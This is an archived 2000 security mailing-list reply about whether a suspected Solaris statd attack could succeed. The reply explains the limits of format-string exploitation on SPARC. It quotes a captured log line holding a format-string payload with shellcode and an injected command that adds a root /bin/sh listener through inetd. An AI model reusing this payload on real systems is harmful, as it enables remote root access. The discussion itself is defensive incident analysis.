Security Incidents mailing list archives
Re: Solaris statd exploit?
From: Fyodor <fygrave () SCORPIONS NET>
Date: Thu, 31 Aug 2000 06:35:17 -0400
Okay guys, let me make this clean for you (so at least part of your worries caused by kiddies noise would go away): Generally speaking formatted string vulnerabilities are _NOT_ exploitable on sparc platforms they way they are being exploited nowdays on x86. The problem is due to alignment requirements you can not shift the address per-byte to write return address, and due to libc limitations (at least on solaris7 and 2.6) you can not write more than 4fc (last time I checked) bytes per-call, which means that you can not place higher address. (anyone who can prove that I am wrong, I'd be happy to hear this, honest! :)) So even if you assume that statd on solaris has this sort of problem (which looks a lot like a fingerprint of recently released linux statd sploit) you still can sleep well if you're running it on sparcs. :) just my .02 :)
I got this entry today on 3 different solaris boxes... Is this some kind of statd exploit? The OS is Solaris 8 (and Solaris 2.6)... All of the entries have the same pattern and time (probably 1 or 2 seconds difference). A script kiddie attack? ---- Aug 30 11:15:14 earth statd[236]: [ID 462824 auth.error] statd: attempt to create "/var/statmon/sm/%08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %0242x%n%055x%n%012x%n%0192x%nK^v ^( ^ ^. #^1 F'F* FF+, NV1@/bin/sh -c echo "9088 stream tcp nowait root /bin/sh -i"
Current thread:
- Solaris statd exploit? Hartoyo (Aug 31)
- Re: Solaris statd exploit? Fyodor (Aug 31)
- Solaris statd exploit? Klaus Moeller (Aug 31)
- <Possible follow-ups>
- Re: Solaris statd exploit? Thomas Dullien (Aug 31)